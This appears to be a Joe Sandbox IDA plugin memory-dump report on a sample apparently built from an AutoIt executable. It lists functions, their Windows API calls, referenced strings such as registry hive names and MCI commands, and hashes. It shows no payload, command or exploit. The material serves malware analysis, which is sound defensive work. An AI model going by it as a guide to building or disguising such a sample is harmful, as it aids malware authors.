Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: cfa756fbb2ecdc7f45f0c4e9ffc792a5d90a0d449b7c3a4680f9e0de1534b74a
Instruction ID: eb5382105d2ade62571755b78257d6f4b8e9360c06fa3790c4145397dc2b66fe
Opcode Fuzzy Hash: cfa756fbb2ecdc7f45f0c4e9ffc792a5d90a0d449b7c3a4680f9e0de1534b74a
Instruction Fuzzy Hash: 0371C170600209FEEB229F54DC45FBBBF69FB04364F204226F725AA1E1C7715820DB94

Function 004088AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004088D7
CoInitialize.OLE32(00000000), ref: 00408904
CoUninitialize.OLE32 ref: 0040890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00408A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00408B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00422C0C), ref: 00408B6F
CoGetObject.OLE32(?,00000000,00422C0C,?), ref: 00408B92
SetErrorMode.KERNEL32(00000000), ref: 00408BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408C25
VariantClear.OLEAUT32(?), ref: 00408C35

Strings

,,B, xrefs: 004088C1

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,B
API String ID: 2395222682-1878338948
Opcode ID: 65372904e903f8091652746d64af64ffba3dba5ae644e03a4af62ee12aaf6e9c
Instruction ID: 44b8c5ad23da220bb207cd74f03764e2fd2a455ffa5dfa0ca86ab90f7ebe48c2
Opcode Fuzzy Hash: 65372904e903f8091652746d64af64ffba3dba5ae644e03a4af62ee12aaf6e9c
Instruction Fuzzy Hash: FBC14AB1608305AFD700DF28C98496BB7E9FF89348F00492EF5899B291DB75ED06CB56

Function 00410E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040FDAD,?,?), ref: 00410E31

Strings

HKEY_CURRENT_USER, xrefs: 00410F10
HKEY_LOCAL_MACHINE, xrefs: 00410E9A
HKCU, xrefs: 00410F21
HKEY_CURRENT_CONFIG, xrefs: 00410EEE
HKCR, xrefs: 00410ED9
HKLM, xrefs: 00410EAF
HKEY_USERS, xrefs: 00410F32
HKEY_CLASSES_ROOT, xrefs: 00410EC4
HKCC, xrefs: 00410EFF
HKU, xrefs: 00410F43

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 34b5cf7450f283686ae9fee27d203dac7528f5a6d64666339abef6c10a34a37b
Instruction ID: ad7c0056af3f45084d2996b4a794821ce3c971bd017cab7758534b9806893db4
Opcode Fuzzy Hash: 34b5cf7450f283686ae9fee27d203dac7528f5a6d64666339abef6c10a34a37b
Instruction Fuzzy Hash: 37418D3150434A8BDF25EF10D856AEF3760BF11304F244816FC551B692DBB89D9BCBA4

Function 003EF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003CE2A0,00000010,?,Bad directive syntax error,0041F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003EF7C2
LoadStringW.USER32(00000000,?,003CE2A0,00000010), ref: 003EF7C9

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

_wprintf.LIBCMT ref: 003EF7FC
__swprintf.LIBCMT ref: 003EF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003EF88D

Strings

Line %d (File "%s"):, xrefs: 003EF833
., xrefs: 003EF873
%s (%d) : ==> %s.: %s %s, xrefs: 003EF7F7
Error: , xrefs: 003EF85B
Line %d:, xrefs: 003EF818

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 05b4191d43700cf36fb8c0c3df7f9f376b1350d3d8e0def01a3538287bf6a41b
Instruction ID: f77973e87111c6f335c137f4d017c915e81f4bbf93dee7b2e6213287b6985bb7
Opcode Fuzzy Hash: 05b4191d43700cf36fb8c0c3df7f9f376b1350d3d8e0def01a3538287bf6a41b
Instruction Fuzzy Hash: BC215E3291021AEFDF13EF90CC4AFEE7779BF18300F04446AF5156A0A2EA71A658DB55

Function 003F52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

Part of subcall function 00397924: _memmove.LIBCMT ref: 003979AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003F5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003F5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003F5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003F537A

Strings

play PlayMe wait, xrefs: 003F5364
play PlayMe, xrefs: 003F5375
close PlayMe, xrefs: 003F5341, 003F536E
open , xrefs: 003F52DF
alias PlayMe, xrefs: 003F5309
status PlayMe mode, xrefs: 003F532B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 5a24a5aa243c5f94a4350cf2c7036c739408c40103e4fe5dca8e206739efc353
Instruction ID: 2355abc19c012170e3e6cce65621ea5dc38d06d25a201a9adbe82cd356d3114e
Opcode Fuzzy Hash: 5a24a5aa243c5f94a4350cf2c7036c739408c40103e4fe5dca8e206739efc353
Instruction Fuzzy Hash: B111C431AA412D79EB61B775DC5AFFFBBBCEB91B40F10042AB501A60D1EEA00D04C9A4

Function 003F46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 003F46D2
gethostname.WSOCK32(?,00000100), ref: 003F46EC
gethostbyname.WSOCK32(?), ref: 003F46F9
_wcscpy.LIBCMT ref: 003F4721
_memmove.LIBCMT ref: 003F4734
inet_ntoa.WSOCK32(?), ref: 003F473F
_strcat.LIBCMT ref: 003F474D
_wcscpy.LIBCMT ref: 003F4764
WSACleanup.WSOCK32 ref: 003F4772
_wcscpy.LIBCMT ref: 003F4780

Strings

0.0.0.0, xrefs: 003F471B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: fc77a56dd6f645054b6d1002748f6975cdd222358451be2222fb052e8ad59d11
Instruction ID: e99f3e9687a4d52a903be89e9948cf30b3c42d58d8bddde79a74dc03cdde073f
Opcode Fuzzy Hash: fc77a56dd6f645054b6d1002748f6975cdd222358451be2222fb052e8ad59d11
Instruction Fuzzy Hash: CC1127315041086FCB16BB309C4AEEF77BCEF41311F0442BAF65596091FF70CA8A8A54

Function 003F4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 003F4F7A

Part of subcall function 003B049F: timeGetTime.WINMM(?,7707B400,003A0E7B), ref: 003B04A3

Sleep.KERNEL32(0000000A), ref: 003F4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 003F4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003F4FEC
SetActiveWindow.USER32 ref: 003F500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003F5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 003F5038
Sleep.KERNEL32(000000FA), ref: 003F5043
IsWindow.USER32 ref: 003F504F
EndDialog.USER32(00000000), ref: 003F5060

Strings

BUTTON, xrefs: 003F4FDE

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 1cc6e17c0ee6bfc5a5fb012e924eccc342cc9048a91078b72782b791b08b631e
Instruction ID: f7d24506858e657567efa58f99c293438bd48dde92d9d19e5f42ec4c6264decc
Opcode Fuzzy Hash: 1cc6e17c0ee6bfc5a5fb012e924eccc342cc9048a91078b72782b791b08b631e
Instruction Fuzzy Hash: DF219D7024570EBFE7129F20FC88A763B69EB4474AF465138F209822B2DB718D458F69

Function 003FD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

CoInitialize.OLE32(00000000), ref: 003FD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003FD67D
SHGetDesktopFolder.SHELL32(?), ref: 003FD691
CoCreateInstance.OLE32(00422D7C,00000000,00000001,00448C1C,?), ref: 003FD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003FD74C
CoTaskMemFree.OLE32(?,?), ref: 003FD7A4
_memset.LIBCMT ref: 003FD7E1
SHBrowseForFolderW.SHELL32(?), ref: 003FD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003FD840
CoTaskMemFree.OLE32(00000000), ref: 003FD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003FD87E
CoUninitialize.OLE32(00000001,00000000), ref: 003FD880

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 6b6ad1485b57a9351b28eb86cfa64d07faa97b17cb71e64665819f7e2fed6ade
Instruction ID: b05605807435e452d30293e49245339ca7a0ab8a089164529dcc3b7415808a7f
Opcode Fuzzy Hash: 6b6ad1485b57a9351b28eb86cfa64d07faa97b17cb71e64665819f7e2fed6ade
Instruction Fuzzy Hash: 1EB10C75A00109AFDB05DFA8C889EAEBBB9FF49314F148469F909DB261DB30ED45CB50

Function 003EC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 003EC283
GetWindowRect.USER32(00000000,?), ref: 003EC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003EC2F3
GetDlgItem.USER32(?,00000002), ref: 003EC2FE
GetWindowRect.USER32(00000000,?), ref: 003EC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003EC364
GetDlgItem.USER32(?,000003E9), ref: 003EC372
GetWindowRect.USER32(00000000,?), ref: 003EC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003EC3C6
GetDlgItem.USER32(?,000003EA), ref: 003EC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003EC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 003EC3FE

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: fd30b40a7839f620cd5b1228fe01938e626fbf01364b7c6600122f21019fafc6
Instruction ID: 7ef6f40f86c49600902a64aff56e19bbf386d6dc87b51043618e2cf4b175fa1b
Opcode Fuzzy Hash: fd30b40a7839f620cd5b1228fe01938e626fbf01364b7c6600122f21019fafc6
Instruction Fuzzy Hash: E5514F71B10205AFDB19CFA9DD89AAEBBB6FB88310F14823DF515D62D0D7709D058B14

Function 0039201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00391B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00392036,?,00000000,?,?,?,?,003916CB,00000000,?), ref: 00391B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003920D3
KillTimer.USER32(-00000001,?,?,?,?,003916CB,00000000,?,?,00391AE2,?,?), ref: 0039216E
DestroyAcceleratorTable.USER32(00000000), ref: 003CBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003916CB,00000000,?,?,00391AE2,?,?), ref: 003CBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003916CB,00000000,?,?,00391AE2,?,?), ref: 003CBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003916CB,00000000,?,?,00391AE2,?,?), ref: 003CBD0A
DeleteObject.GDI32(00000000), ref: 003CBD1C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: af1dbbd2c18d964f551ff5f10d16a40eee2940891c24c05e3732440a5875b16e
Instruction ID: 6932b40562ee14af9cdc8e9b79c45af6503d74a73ceff2a98184500d94cfb1a3
Opcode Fuzzy Hash: af1dbbd2c18d964f551ff5f10d16a40eee2940891c24c05e3732440a5875b16e
Instruction Fuzzy Hash: E0618531500F00EFDB26AF15D959B2ABBF2FB44312F51843DE4428AAA1C770ACA5DB94

Function 003921A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 003925DB: GetWindowLongW.USER32(?,000000EB), ref: 003925EC

GetSysColor.USER32(0000000F), ref: 003921D3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 6d5e46b3a73790fd7d318ed9fc5d9b78875bd1e2ba310821ed509f1fec39d87a
Instruction ID: 58d2c91e1214dd447fec93d866133a8a4270b4e3ef037b3e0117817de7f2182c
Opcode Fuzzy Hash: 6d5e46b3a73790fd7d318ed9fc5d9b78875bd1e2ba310821ed509f1fec39d87a
Instruction Fuzzy Hash: 2841A331004954FBDF265F28EC88BBA3B66EB06731F158275FDA58A1E2C7318C42DB15

Function 003FA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0041F910), ref: 003FA90B
GetDriveTypeW.KERNEL32(00000061,004489A0,00000061), ref: 003FA9D5
_wcscpy.LIBCMT ref: 003FA9FF

Strings

all, xrefs: 003FA911
cdrom, xrefs: 003FA927
fixed, xrefs: 003FA953
network, xrefs: 003FA969
ramdisk, xrefs: 003FA97F
unknown, xrefs: 003FA996
removable, xrefs: 003FA93D

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: cff58db420e238754a54f1b69017a581967c0697fb6ae98491c3e45d93cef42f
Instruction ID: b480b1614d22b07ebd39c5b4a8bf21660e90f791101f95ec9ab5c6baac6658fa
Opcode Fuzzy Hash: cff58db420e238754a54f1b69017a581967c0697fb6ae98491c3e45d93cef42f
Instruction Fuzzy Hash: B151C0715187089BC706EF14C892ABFB7E5FF84304F11482EF6995B2A2DB71D909CA53

Function 00399837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00399862
__swprintf.LIBCMT ref: 003998AC
__i64tow.LIBCMT ref: 003CF5E6

Strings

True, xrefs: 003CF5A7
False, xrefs: 003CF5AE
%.15g, xrefs: 003998A6
0x%p, xrefs: 003CF5C8

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 960b568969a140eaf1f2225853a7c690cec76ad619f2c0812bb535f44ec81f5f
Instruction ID: fad3f94a3c12bbfc01db4601a54b6f63e3b9612481ffa5918ceabcb1e40c7df8
Opcode Fuzzy Hash: 960b568969a140eaf1f2225853a7c690cec76ad619f2c0812bb535f44ec81f5f
Instruction Fuzzy Hash: E141B771504209AFEF26EF38D841FBA73E9EF06304F24446FE649DB691EA319D418710

Function 00417152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041716A
CreateMenu.USER32 ref: 00417185
SetMenu.USER32(?,00000000), ref: 00417194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00417221
IsMenu.USER32(?), ref: 00417237
CreatePopupMenu.USER32 ref: 00417241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0041726E
DrawMenuBar.USER32 ref: 00417276

Strings

F, xrefs: 00417262
0, xrefs: 00417160

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: c8f24732164c76b00688c9e49dec3bdc6733ea51a6178b87282d3210de59ff58
Instruction ID: 92f8c1bbdf3391fb6fef771b22cecdcea23380fabc0aa9a0e63642bd2c2fe8dd
Opcode Fuzzy Hash: c8f24732164c76b00688c9e49dec3bdc6733ea51a6178b87282d3210de59ff58
Instruction Fuzzy Hash: 06416574A01209EFDB20DFA4D884EEABBF6FF48310F14416AF905A7361D735A915CB98

Function 004174BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0041755E
CreateCompatibleDC.GDI32(00000000), ref: 00417565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00417578
SelectObject.GDI32(00000000,00000000), ref: 00417580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0041758B
DeleteDC.GDI32(00000000), ref: 00417594
GetWindowLongW.USER32(?,000000EC), ref: 0041759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004175B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004175BE

Strings

static, xrefs: 004174F6

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: ad4a2699d4fe80a17cd61e302e9b09e40a10c9c8fc8fc0b60fdff6a1dff9b504
Instruction ID: d69dc6086b0a0da875aff4240d52ec76869d2d534b54c8155846821a934e6e38
